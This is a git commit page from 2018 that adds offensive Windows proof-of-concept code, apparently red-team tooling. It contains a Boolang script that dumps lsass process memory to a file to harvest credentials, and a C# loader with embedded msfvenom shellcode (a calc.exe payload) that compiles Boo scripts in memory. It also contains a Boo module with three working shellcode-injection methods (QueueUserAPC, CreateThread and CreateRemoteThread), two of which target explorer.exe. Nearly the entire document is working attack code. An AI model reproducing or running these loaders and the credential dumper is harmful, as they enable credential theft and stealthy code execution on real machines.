Initial Commit

This commit is contained in:
byt3bl33d3r
2018-12-06 00:01:52 -07:00
commit ee08a6bbc2
4 changed files with 436 additions and 0 deletions
+153
View File
File diff suppressed because one or more lines are too long
Executable
+25
View File
@@ -0,0 +1,25 @@
import System.Runtime.InteropServices
from System.Diagnostics import Process
from System.IO import FileStream, FileMode, FileAccess,FileShare
/*
Author: Marcello Salvati (@byt3bl33d3r)
License: BSD 3-Clause
This Boolang source file can be run directly with the booi.exe interpreter or using the embedded compiler in runBoo.cs
*/
[DllImport("Dbghelp.dll", EntryPoint:"MiniDumpWriteDump")]
def minidumpwritedump(hProcess as int, ProcessId as int, hFile as int, DumpType as int, ExceptionParam as int, UserStreamParam as int, CallbackParam as int):
pass
def main():
procname = 'lsass'
ids = Process.GetProcessesByName(procname)
for pid in ids:
file = "C:\\MIRIAM.dmp"
fs = FileStream(file, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)
minidumpwritedump(pid.Handle, pid.Id, fs.Handle,0x00000002,0,0,0)
print "Dumped to $file"
Executable
+114
View File
@@ -0,0 +1,114 @@
using System;
using System.Text;
using System.Reflection;
using Boo.Lang.Compiler;
using Boo.Lang.Compiler.IO;
using Boo.Lang.Compiler.Pipelines;
/*
Author: Marcello Salvati (@byt3bl33d3r)
License: BSD 3-Clause
1) Download the latest stable version of Boolang https://github.com/boo-lang/boo/releases
2) In the directory with the Boolang DLLs compile with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:Boo.Lang.Compiler.dll,Boo.Lang.dll,Boo.Lang.Parser.dll /t:exe runBoo.cs
3) Usage: runBoo.exe shellcode.boo <InjectionMethod> <x86|x64>
Example: runBoo.exe shellcode.boo InjectRemote
See shellcode.boo for the injection methods available
This PoC won't work without the Boolang DLLs and shellcode.boo file in the same directory but you can easily fix that with a little C# trickery :)
References:
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
- https://github.com/pwndizzle/c-sharp-memory-injection
*/
namespace ConsoleApplication1
{
class Program
{
public static void Main(string[] args)
{
// msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp
byte[] sc64 = new byte[276] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00 };
// msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f csharp
byte[] sc86 = new byte[193] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
BooCompiler compiler = new BooCompiler();
//compiler.Parameters.Input.Add(new StringInput("print 'Doot Doot'!")); :)
compiler.Parameters.Input.Add(new FileInput(args[0]));
compiler.Parameters.Pipeline = new CompileToMemory();
compiler.Parameters.Ducky = true;
CompilerContext context = compiler.Run();
//Note that the following code might throw an error if the Boo script had bugs.
//Poke context.Errors to make sure.
if (context.GeneratedAssembly != null)
{
Type scriptModule = context.GeneratedAssembly.GetType("Inject");
MethodInfo injectMain = scriptModule.GetMethod(args[1]);
if (args.Length == 3)
{
if (args[2] == "x86")
{
Console.WriteLine("Using x86 Shellcode");
string output = (string)injectMain.Invoke(null, new object[] {sc86} );
}
}
else
{
Console.WriteLine("Using x64 Shellcode");
string output = (string)injectMain.Invoke(null, new object[] {sc64} );
Console.WriteLine(output);
}
}
else
{
foreach (CompilerError error in context.Errors)
Console.WriteLine(error);
}
Console.WriteLine("Boo!");
}
}
}
Executable
+144
View File
@@ -0,0 +1,144 @@
import System.Runtime.InteropServices
from System.Diagnostics import Process
from System import IntPtr
/*
Author: Marcello Salvati (@byt3bl33d3r)
License: BSD 3-Clause
This Boolang source file can be run directly with the booi.exe interpreter or using the embedded compiler in runBoo.cs/Invoke-JumpScare.ps1
References:
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
- https://github.com/pwndizzle/c-sharp-memory-injection
*/
class Inject:
[DllImport("kernel32.dll")]
def OpenProcess(dwDesiredAccess as int, bInheritHandle as bool, dwProcessID as int) as int:
pass
[DllImport("kernel32.dll")]
def VirtualAllocEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as int:
pass
[DllImport("kernel32.dll")]
def VirtualProtectEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as bool:
pass
[DllImport("kernel32.dll")]
def WriteProcessMemory(hProcess as int, lpBaseAddress as int, lpBuffer as (byte), nSize as int, lpNumberOfBytesWritten as int) as bool:
pass
[DllImport("kernel32.dll")]
def OpenThread(dwDesiredAccess as int, bInheritHandle as bool, dwThreadId as int) as int:
pass
[DllImport("kernel32.dll")]
def QueueUserAPC(pfnAPC as int, hThread as int, dwData as int) as int:
pass
[DllImport("kernel32.dll")]
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as uint, flProtect as uint) as int:
pass
[DllImport("kernel32.dll")]
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
pass
[DllImport("kernel32.dll")]
def CreateRemoteThread(hProcess as int, lpThreadAttributes as int, dwStackSize as uint, lpStartAddress as int, lpParameter as int, dwCreationFlags as uint, lpThreadId as int) as int:
pass
[DllImport("kernel32.dll")]
def WaitForSingleObject(hHandle as int, dwMilliseconds as long):
pass
public static def InjectQueueUserAPC(sc as (byte)):
# Process Privileges
PROCESS_VM_OPERATION = 0x0008 cast int
PROCESS_VM_WRITE = 0x0020 cast int
PROCESS_VM_READ = 0x0010 cast int
# Memory Permissions
MEM_COMMIT = 0x1000 cast uint
PAGE_EXECUTE_READWRITE = 0x40 cast uint
PAGE_EXECUTE_READ = 0x20 cast uint
# Thread Permissions
SUSPEND_RESUME = (0x0002) cast int
GET_CONTEXT = (0x0008) cast int
SET_CONTEXT = (0x0010) cast int
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT
targetProcess = Process.GetProcessesByName("explorer")[0]
procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id)
print "procHandle = $procHandle"
resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
print "resultPtr = $resultPtr"
bytesWritten as int = 0;
resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"
oldProtect as uint = 0
resultBool = VirtualProtectEx(procHandle cast IntPtr, resultPtr cast IntPtr, sc.Length, PAGE_EXECUTE_READ, oldProtect)
print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"
for thread in targetProcess.Threads:
tHandle = OpenThread(THREAD_HIJACK, false, thread.Id cast int)
print "tHandle = $tHandle"
ptr = QueueUserAPC(resultPtr cast IntPtr, tHandle, 0)
print "QueueUserAPC = $ptr"
print "Injected"
public static def InjectSelf(sc as (byte)):
MEM_COMMIT = 0x1000 cast uint
PAGE_EXECUTE_READWRITE = 0x40 cast uint
currentProcess = Process.GetCurrentProcess()
threadId = 0
pinfo = 0
funcAddr = VirtualAlloc(0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
print "funcAddr = $funcAddr"
Marshal.Copy(sc, 0 , funcAddr cast IntPtr, sc.Length)
//oldProtect as uint = 0
//resultBool = VirtualProtectEx(currentProcess.Handle cast IntPtr, funcAddr cast IntPtr, sc.Length, PAGE_EXECUTE_READWRITE, oldProtect)
//print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"
hThread = CreateThread(0, 0, funcAddr, pinfo, 0 ,threadId)
print "hThread = $hThread"
WaitForSingleObject(hThread, 0xFFFFFFFF)
print "Injected"
public static def InjectRemote(sc as (byte)):
# Process Privileges
PROCESS_VM_OPERATION = 0x0008 cast int
PROCESS_VM_WRITE = 0x0020 cast int
PROCESS_VM_READ = 0x0010 cast int
PROCESS_ALL = 0x1F0FFF cast int
# Memory Permissions
MEM_COMMIT = 0x1000 cast uint
PAGE_EXECUTE_READWRITE = 0x40 cast uint
targetProcess = Process.GetProcessesByName("explorer")[0]
procHandle = OpenProcess(PROCESS_ALL, false, targetProcess.Id)
print "procHandle = $procHandle"
resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
print "resultPtr = $resultPtr"
bytesWritten as int = 0;
resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"
CreateRemoteThread(procHandle cast IntPtr, 0, 0, resultPtr cast IntPtr, 0, 0, 0)
print "Injected"